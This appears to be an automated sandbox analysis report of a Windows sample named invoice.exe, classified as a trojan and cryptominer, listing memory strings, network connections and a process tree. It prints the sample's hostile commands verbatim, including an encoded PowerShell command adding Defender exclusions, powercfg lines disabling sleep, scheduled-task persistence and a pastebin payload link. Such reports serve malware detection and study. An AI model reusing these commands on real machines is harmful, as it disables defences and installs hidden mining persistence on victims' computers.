Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/react-lib-7b7b5264f6c1.js
Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/sessions-f3ddee0032e4.js
Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/site-6a145c5564e7.css
Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/ui_packages_onfocus_onfocus_ts-ui_packages_trusted-types-poli
Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/ui_packages_react-core_create-browser-history_ts-ui_packages_
Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/ui_packages_ui-commands_ui-commands_ts-1672e119bd73.js
Source: AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/ui_packages_updatable-content_updatable-content_ts-a2
Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/ui_packages_updatable-content_updatable-content_ts-a2009221d1
Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_braintree_browser-detection_dist_browser
Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_color-convert_index_js-0e07cc183eed.js
Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modu
Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_dompurify_dist_purify_js-89a69c248502.js
Source: AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_arianotify-polyfill_ariaNotify-po
Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_auto-complete-element_dist_index_
Source: AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_catalyst_lib_index_js-node_module
Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_inde
Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_j
Source: AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_hotkey_dist_index_js-node_modules
                  Source: AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_quote-selection_dist_index_js-nod
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_relative-time-element_dist_index_
                  Source: AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_mo
                  Source: AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_selector-observer
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_selector-observer_dist_index_esm_
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_session-resume_dist_index_js-node
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_text-expander-element_dist_index_
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_turbo_dist_turbo_es2017-esm_js-85
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_lit-html_lit-html_js-ce7225a304c5.js
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_oddbird_popover-polyfill_dist_popover_js
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_anchored-posit
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js-
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_focus-zone_js-
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_ActionList_index_js
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Box_Box_js-55a9038b
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Button_Button_js-b0
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Dialog_Dialog_js-no
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_TooltipV2_Tooltip_j
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_react_node_modules_primer_octicon
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_scroll-anchoring_dist_scroll-anchoring_e
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/wp-runtime-bfe1537bfda1.js
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/favicons/favicon.png
                  Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/favicons/favicon.svg
Source: powershell.exe, 00000012.00000002.1771702120.000000000562A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1771702120.00000000057A9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
Source: powershell.exe, 00000012.00000002.1774355211.0000000005EAA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://partner.github.com
Source: AppLaunch.exe, 0000000F.00000002.1789091903.0000000006924000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://pastebin.com
Source: AppLaunch.exe, 0000000F.00000002.1789091903.0000000006971000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006841000.00000004.00000800.00020000.00000000.sdmp, logs.uce.15.dr, logs.uce1.15.dr, logs.uce0.15.dr | String found in binary or memory: https://pastebin.com/raw/PTNbBX9V
Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://resources.github.com
Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://resources.github.com/learn/pathways
Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://skills.github.com
Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://user-images.githubusercontent.com/
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown | Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown | Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown | HTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:49739 version: TLS 1.2

System Summary

Source: initial sample | Static PE information: Filename: invoice.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | File created: C:\ProgramData\Dllhost\WinRing0x64.sys
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\4usfliof.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4520 -s 288
Source: invoice.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engine | Classification label: mal100.troj.evad.mine.winEXE@38/23@2/3
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2996:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Mutant created: \Sessions\1\BaseNamedObjects\ProgramV3
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4176:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7304:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4520
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5744
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7312:120:WilError_03
Source: C:\Users\user\Desktop\invoice.exe | File created: C:\Users\user\AppData\Local\Temp\RarSFX0
Source: C:\Users\user\Desktop\invoice.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.bat" "
Source: invoice.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\invoice.exe | File read: C:\Windows\win.ini
Source: C:\Users\user\Desktop\invoice.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: invoice.exe | ReversingLabs: Detection: 60%
Source: C:\Users\user\Desktop\invoice.exe | File read: C:\Users\user\Desktop\invoice.exe
Source: unknown | Process created: C:\Users\user\Desktop\invoice.exe "C:\Users\user\Desktop\invoice.exe"
Source: C:\Users\user\Desktop\invoice.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.bat" "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c dir /b "*.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\4usfliof.exe "4usfliof.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\yee9mbi69cm7.exe "yee9mbi69cm7.exe"
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\4usfliof.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\4usfliof.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4520 -s 288
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\yee9mbi69cm7.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\yee9mbi69cm7.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\yee9mbi69cm7.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5744 -s 224
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C powershell -EncodedCommand "PAAjADUASwBtAHMAOAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHcASAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAGwASgBhADgAYwBqADkAWgAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB0AFcAQwAjAD4A" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "PAAjADUASwBtAHMAOAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHcASAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAGwASgBhADgAYwBqADkAWgAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB0AFcAQwAjAD4A"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk9049" /TR "C:\ProgramData\Dllhost\dllhost.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk9049" /TR "C:\ProgramData\Dllhost\dllhost.exe"
Source: C:\Users\user\Desktop\invoice.exe | Section loaded: api-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\Desktop\invoice.exe | Section loaded: api-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\Desktop\invoice.exe | Section loaded: api-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\Desktop\invoice.exe | Section loaded: api-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\Desktop\invoice.exe | Section loaded: api-ms-win-core-localization-l1-2-1.dll
Source: C:\Users\user\Desktop\invoice.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\invoice.exe | Section loaded: dxgidebug.dll
Source: C:\Users\user\Desktop\invoice.exe | Section loaded: sfc_os.dll
Source: C:\Users\user\Desktop\invoice.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\invoice.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\invoice.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\invoice.exe | Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\invoice.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\invoice.exe | Section loaded: riched20.dll
Source: C:\Users\user\Desktop\invoice.exe | Section loaded: usp10.dll
Source: C:\Users\user\Desktop\invoice.exe | Section loaded: msls31.dll
Source: C:\Users\user\Desktop\invoice.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\invoice.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\invoice.exe | Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\invoice.exe | Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\invoice.exe | Section loaded: coreuicomponents.dll
